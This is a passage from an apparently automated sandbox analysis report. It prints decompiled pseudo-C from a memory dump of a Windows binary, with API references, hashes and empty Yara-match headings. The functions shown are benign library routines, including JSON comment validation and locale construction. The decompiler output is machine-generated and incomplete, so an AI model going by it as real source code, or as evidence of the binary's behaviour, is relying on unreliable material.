                                                  				}
                                                  				return E1002EB91(_t33);
                                                  			}

                                                  APIs
                                                    • Part of subcall function 1002B8B7: __amsg_exit.LIBCMT ref: 1002B8C5
                                                  • __amsg_exit.LIBCMT ref: 1002CBEB
                                                  • __lock.LIBCMT ref: 1002CBFB
                                                  • InterlockedDecrement.KERNEL32(?), ref: 1002CC18
                                                  • InterlockedIncrement.KERNEL32(04671300), ref: 1002CC43
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                                                  • String ID:
                                                  • API String ID: 4129207761-0
                                                  • Opcode ID: 7715c4f9c32f171116a43dbbef44b33c943809d38fa89fca348d4e3fc96629b6
                                                  • Instruction ID: ad92fae20f4184f40ec43aa240e40a867825198d69d1ce997911aefc2c727d13
                                                  • Opcode Fuzzy Hash: 7715c4f9c32f171116a43dbbef44b33c943809d38fa89fca348d4e3fc96629b6
                                                  • Instruction Fuzzy Hash: 9501ED39A0066A9BC712DBA8B886F8D73E0FB08750FA5400AF815A7681CB34AC40DBD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E1000E3D0(intOrPtr __ecx, void* __eflags) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr* _t21;
                                                  
                                                  				_push(__ecx);
                                                  				_v8 = __ecx;
                                                  				E1000ECC0(_v8, __eflags,  *((intOrPtr*)(E1000F4A0(_v8))));
                                                  				 *((intOrPtr*)(E1000F4A0(_v8))) =  *((intOrPtr*)(_v8 + 4));
                                                  				 *((intOrPtr*)(_v8 + 8)) = 0;
                                                  				 *((intOrPtr*)(E1000F2B0(_v8))) =  *((intOrPtr*)(_v8 + 4));
                                                  				_t21 = E1000F480(_v8);
                                                  				 *_t21 =  *((intOrPtr*)(_v8 + 4));
                                                  				return _t21;
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Handle
                                                  • String ID:
                                                  • API String ID: 2519475695-0
                                                  • Opcode ID: 7d389c4537a8e9a154790655cc188299dab765cb01ab5c9ee2a0fe1b9495906b
                                                  • Instruction ID: 9602c7fa5371672ab2807ae449baa16fa1a822b9fad34f2c425f0f31a4d00967
                                                  • Opcode Fuzzy Hash: 7d389c4537a8e9a154790655cc188299dab765cb01ab5c9ee2a0fe1b9495906b
                                                  • Instruction Fuzzy Hash: 85F04778A00108EFD708DF99C69296EB7F5EF89344B2081D8E8095B765DB31AE01EB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E1013AB30(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, char* _a4, intOrPtr _a8) {
                                                  				char _v8;
                                                  				intOrPtr _v16;
                                                  				char _v144;
                                                  				char _v172;
                                                  				char _v200;
                                                  				intOrPtr* _v204;
                                                  				intOrPtr _v208;
                                                  				intOrPtr _v212;
                                                  				void* __ebp;
                                                  				intOrPtr _t34;
                                                  				void* _t49;
                                                  				void* _t69;
                                                  				void* _t70;
                                                  				intOrPtr _t71;
                                                  				void* _t72;
                                                  
                                                  				_t70 = __esi;
                                                  				_t69 = __edi;
                                                  				_t49 = __ebx;
                                                  				_push(0xffffffff);
                                                  				_push(0x1016d51d);
                                                  				_push( *[fs:0x0]);
                                                  				 *[fs:0x0] = _t71;
                                                  				_t72 = _t71 - 0xc4;
                                                  				_v204 = __ecx;
                                                  				if( *_v204 != 0) {
                                                  					_push(0);
                                                  					E10138530( *_v204);
                                                  					_t72 = _t72 + 8;
                                                  					 *_v204 = 0;
                                                  				}
                                                  				if(_a4 == 0) {
                                                  					E10001320( &_v172, "assert json failed");
                                                  					_v8 = 0;
                                                  					E10138DD0( &_v172);
                                                  					_v8 = 0xffffffff;
                                                  					E10001360( &_v172);
                                                  				}
                                                  				if( *_a4 != 0 &&  *_a4 != 0x2f) {
                                                  					E10006F20( &_v144, 2, 1);
                                                  					_v8 = 1;
                                                  					E1000FF20( &_v144,  &_v144, "in Json::Value::setComment(): Comments must start with /");
                                                  					_t72 = _t72 + 8;
                                                  					_v208 = E10007040( &_v144,  &_v200);
                                                  					_v212 = _v208;
                                                  					_v8 = 2;
                                                  					E10138DD0(_v212);
                                                  					_v8 = 1;
                                                  					E10001360( &_v200);
                                                  					E10026CE8(_t49, _v208, _t69, _t70);
                                                  					_v8 = 0xffffffff;
                                                  					E10005930( &_v144, _t70);
                                                  				}
                                                  				_t34 = E10138E30(_t49, _a4, _t69, _t70, _a4, _a8);
                                                  				 *_v204 = _t34;
                                                  				 *[fs:0x0] = _v16;
                                                  				return _t34;
                                                  			}



















                                                  APIs
                                                  Strings
                                                  • in Json::Value::setComment(): Comments must start with /, xrefs: 1013ABEC
                                                  • assert json failed, xrefs: 1013AB84
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _abort
                                                  • String ID: assert json failed$in Json::Value::setComment(): Comments must start with /
                                                  • API String ID: 1888311480-3359747093
                                                  • Opcode ID: c56229c0dd17345ef77e92aad40df9d759a09e95372b5866d612481c7000d63c
                                                  • Instruction ID: f51410651d1f4f3591cc84c21d601798cf6c658f3d52e8c4a7e1793ed2fd0674
                                                  • Opcode Fuzzy Hash: c56229c0dd17345ef77e92aad40df9d759a09e95372b5866d612481c7000d63c
                                                  • Instruction Fuzzy Hash: F9313575901218EBEB14CF60DC91F9EB771EB15351F5082D8E4596B280DB786E88CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E100047D0(intOrPtr __ecx, intOrPtr _a4) {
                                                  				char _v8;
                                                  				intOrPtr _v16;
                                                  				char _v56;
                                                  				char _v84;
                                                  				intOrPtr _v88;
                                                  				void* __ebp;
                                                  				void* _t39;
                                                  				void* _t56;
                                                  				void* _t57;
                                                  				void* _t58;
                                                  				intOrPtr _t59;
                                                  
                                                  				_push(0xffffffff);
                                                  				_push(0x1017070c);
                                                  				_push( *[fs:0x0]);
                                                  				 *[fs:0x0] = _t59;
                                                  				_v88 = __ecx;
                                                  				E10022AB1(_v88, 0);
                                                  				_v8 = 0;
                                                  				E10002370(_v88 + 4);
                                                  				_v8 = 1;
                                                  				E10002370(_v88 + 0x20);
                                                  				_v8 = 2;
                                                  				E10002370(_v88 + 0x3c);
                                                  				_v8 = 3;
                                                  				E10002370(_v88 + 0x58);
                                                  				_v8 = 4;
                                                  				_t62 = _a4;
                                                  				if(_a4 == 0) {
                                                  					E10001320( &_v84, "bad locale name");
                                                  					_v8 = 5;
                                                  					E100046F0( &_v56, _t62,  &_v84);
                                                  					E10028911( &_v56, 0x1027f348);
                                                  					_v8 = 4;
                                                  					E10001360( &_v84);
                                                  				}
                                                  				E10022A0F(_t39, _a4, _t56, _t57, _t58, _t62, _v88, _a4);
                                                  				_v8 = 0xffffffff;
                                                  				 *[fs:0x0] = _v16;
                                                  				return _v88;
                                                  			}















                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 100047F3
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 10004880
                                                    • Part of subcall function 10028911: RaiseException.KERNEL32(?,?,100235F7,10001F33,?,?,?,?,100235F7,10001F33,1027F310,10401814), ref: 10028951
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_Raise
                                                  • String ID: bad locale name
                                                  • API String ID: 3938578125-1405518554
                                                  • Opcode ID: a7ccac8e3d0f33a6d32eff9abd7e62158dfd656fc807623f1fef3cbee5a4056a
                                                  • Instruction ID: 095400531e99ff96a8e079db4db20960511de84e9f6df8617b8c41e8a6198733
                                                  • Opcode Fuzzy Hash: a7ccac8e3d0f33a6d32eff9abd7e62158dfd656fc807623f1fef3cbee5a4056a
                                                  • Instruction Fuzzy Hash: 77219374804188EBDB19DBD4C955BEDBB74EF11344F248158F4022B38ADB786F08CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%